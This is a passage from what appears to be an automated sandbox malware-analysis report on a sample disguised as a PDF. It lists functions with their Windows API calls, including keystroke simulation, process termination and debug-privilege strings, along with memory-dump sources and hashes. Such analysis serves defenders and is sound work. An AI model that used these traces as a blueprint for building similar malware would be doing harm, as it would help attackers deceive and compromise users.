                                                                                                                        • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 007B4FE2
                                                                                                                      • _wcscmp.LIBCMT ref: 007B4FFC
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 007B5017
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                                                                                                                      • Instruction ID: 59f7ccedfc79cf3987b540e47bb295b43ee488943b2f0976cf2a45c4635e5592
                                                                                                                      • Opcode Fuzzy Hash: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                                                                                                                      • Instruction Fuzzy Hash: 365186B24087849BC724EB64D885ADFB7ECAF84341F00492EF589D7152EF78A18D8766
                                                                                                                      Function 007D88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D896E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                                                                                                                      • Instruction ID: 92a0f989e55326e50c507e5eaa4cc6d51efd2456992d4328eff861f4339a175a
                                                                                                                      • Opcode Fuzzy Hash: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                                                                                                                      • Instruction Fuzzy Hash: 6F51A230600204FFDB609F28CC89BA93B75FB45320F648113F956E63A1DF79A9909B92
                                                                                                                      Function 00752B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C547
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C569
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C581
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C59F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C5C0
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0078C5CF
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C5EC
                                                                                                                      • DestroyIcon.USER32(?), ref: 0078C5FB
                                                                                                                        • Part of subcall function 007DA71E: DeleteObject.GDI32(00000000), ref: 007DA757
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                                                                                                                      • Instruction ID: 0ffc50ec059b8fc528871883727acca7bb0fd7260c2008899f02ed5f166c34b4
                                                                                                                      • Opcode Fuzzy Hash: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                                                                                                                      • Instruction Fuzzy Hash: 71517AB0640209EFDB24DF24CC45FAA3BB5FB45311F104529F942A72A1EBB8ED95DB60
                                                                                                                      Function 007A9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AAE77
                                                                                                                        • Part of subcall function 007AAE57: GetCurrentThreadId.KERNEL32 ref: 007AAE7E
                                                                                                                        • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A9B90
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B99
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A9BB7
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BBA
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9BC3
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BDD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                                                                                                                      • Instruction ID: cf14262256795cfbc26b9c3e536398cbb2dee16b0485c6a34e9096fc22d74882
                                                                                                                      • Opcode Fuzzy Hash: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                                                                                                                      • Instruction Fuzzy Hash: 9011E1B1650218FEF7106B60DC8EF6A3B2DEB4D751F104426F345AB0A0CAF75C10DAA8
                                                                                                                      Function 007A8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E0C
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E13
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E28
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E30
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E33
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E43
                                                                                                                      • GetCurrentProcess.KERNEL32(007A8A84,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4B
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4E
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,007A8E74,00000000,00000000,00000000), ref: 007A8E68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                                                                                                                      • Instruction ID: 4d3a1f9d4833f3ad1ef1e2d454577f8feee2a6b9ad17df03bc9c6e8f4eed3535
                                                                                                                      • Opcode Fuzzy Hash: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                                                                                                                      • Instruction Fuzzy Hash: AB01BBB5241308FFE710ABA5DC4DF6B3BACEB89711F008421FA05DB1A1CA759C00CB24
                                                                                                                      Function 007C9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                                                                                                                        • Part of subcall function 007A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                                                                                                                        • Part of subcall function 007A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                                                                                                                        • Part of subcall function 007A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9B1B
                                                                                                                      • _memset.LIBCMT ref: 007C9B28
                                                                                                                      • _memset.LIBCMT ref: 007C9C6B
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9C97
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 007C9CA2
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 007C9CF0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: a099d458a48cf0221a854e756097f0f6aabde73108c4fc9e4dee7fdbcc01ec74
                                                                                                                      • Instruction ID: 11cf7c340a08cadf78de06e255d629d7909b8e2f2b03c11f0cc924e052387613
                                                                                                                      • Opcode Fuzzy Hash: a099d458a48cf0221a854e756097f0f6aabde73108c4fc9e4dee7fdbcc01ec74
                                                                                                                      • Instruction Fuzzy Hash: 27911871D00219EBDB10DFA5DC89EDEBBB9BF08710F20815AF519A7281DB759A44CFA0
                                                                                                                      Function 007D6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D7093
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D70A7
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D70C1
                                                                                                                      • _wcscat.LIBCMT ref: 007D711C
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D7133
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D7161
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                                                                                                                      • Instruction ID: e1a1b8febd07dfd430ddc021cc273436b2fb8604b5e4a26a1576fa6abc93b40f
                                                                                                                      • Opcode Fuzzy Hash: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                                                                                                                      • Instruction Fuzzy Hash: 3C417071904308EBDB259F64CC85BEA77B8EF08350F10452BF555E62D2E67A9D84CB60
                                                                                                                      Function 007CEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3EB6
                                                                                                                        • Part of subcall function 007B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007B3EC4
                                                                                                                        • Part of subcall function 007B3E91: CloseHandle.KERNEL32(00000000), ref: 007B3F8E
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECB8
                                                                                                                      • GetLastError.KERNEL32 ref: 007CECCB
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECFA
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CED77
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 007CED82
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007CEDB7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                                                                                                                      • Instruction ID: 530e7338f64ff1dce40fe98f2507a27f0ebbe1195ba453226dbb0f74713289fd
                                                                                                                      • Opcode Fuzzy Hash: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                                                                                                                      • Instruction Fuzzy Hash: 15416B71200201DFDB14EF24CC99FAEB7A5AF81714F18845DF9439B2D2DBB9A904CB96
                                                                                                                      Function 007B3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 007B32C5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                                                                                                                      • Instruction ID: 97383c87802c9d8635d571b14ffac5ff1852f8ce4c6f62ee58f7b9e5f883f898
                                                                                                                      • Opcode Fuzzy Hash: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                                                                                                                      • Instruction Fuzzy Hash: C411273224875AFAEB055A54DC42EEAB39CFF19370F20402AF515A62C1E66D5B8046A5
                                                                                                                      Function 007B4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B454E
                                                                                                                      • LoadStringW.USER32(00000000), ref: 007B4555
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B456B
                                                                                                                      • LoadStringW.USER32(00000000), ref: 007B4572
                                                                                                                      • _wprintf.LIBCMT ref: 007B4598
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B45B6
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 007B4593
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                      • Opcode ID: f2e0c9df9a382e0cf94c757df3b920112c8e99cc3101d8c5d426861cf11010f2
                                                                                                                      • Instruction ID: 696a693e8b8a3941e77bfd9f22fcde94ec325a2c1702b42ef24d35634cf89475
                                                                                                                      • Opcode Fuzzy Hash: f2e0c9df9a382e0cf94c757df3b920112c8e99cc3101d8c5d426861cf11010f2
                                                                                                                      • Instruction Fuzzy Hash: 7B0144F2900208BFE7509794DD89EE6777CDB08301F0045A6F74AE2151E6799E854B75
                                                                                                                      Function 007DD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 007DD78A
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 007DD7AA
                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD9E5
                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DDA03
                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DDA24
                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 007DDA43
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 007DDA68
                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 007DDA8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1211466189-0
                                                                                                                      • Opcode ID: 0d37a0af8256cd3776a72d75fd7834e6ec4e72f8f589a871ceb0bcac1c31e512
                                                                                                                      • Instruction ID: 91529b864aa2ab4a8094e35a37170a95885a591aaccef750384a02aa93268d35
                                                                                                                      • Opcode Fuzzy Hash: 0d37a0af8256cd3776a72d75fd7834e6ec4e72f8f589a871ceb0bcac1c31e512
                                                                                                                      • Instruction Fuzzy Hash: A9B18871600225EFDF24CF68C9997AD7BB1FF48711F08C06AEC899A295D739AD50CB60
                                                                                                                      Function 00752A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 00752ACF
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C46A
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C4D6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ShowWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1268545403-0
                                                                                                                      • Opcode ID: d7449acbf011498127f5baf3834ae5ac315681fa3a453dfe9099aa9a639a54cf
                                                                                                                      • Instruction ID: fed06514637dea9d95de0bddbe3212610bfe20293362967a82cccf77f91ed014
                                                                                                                      • Opcode Fuzzy Hash: d7449acbf011498127f5baf3834ae5ac315681fa3a453dfe9099aa9a639a54cf
                                                                                                                      • Instruction Fuzzy Hash: CF41EE312046C0AAC7369B288C9C7F67BA5AF47312F54C41EED4786562D6FD988FD720
                                                                                                                      Function 007B7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 007B737F
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
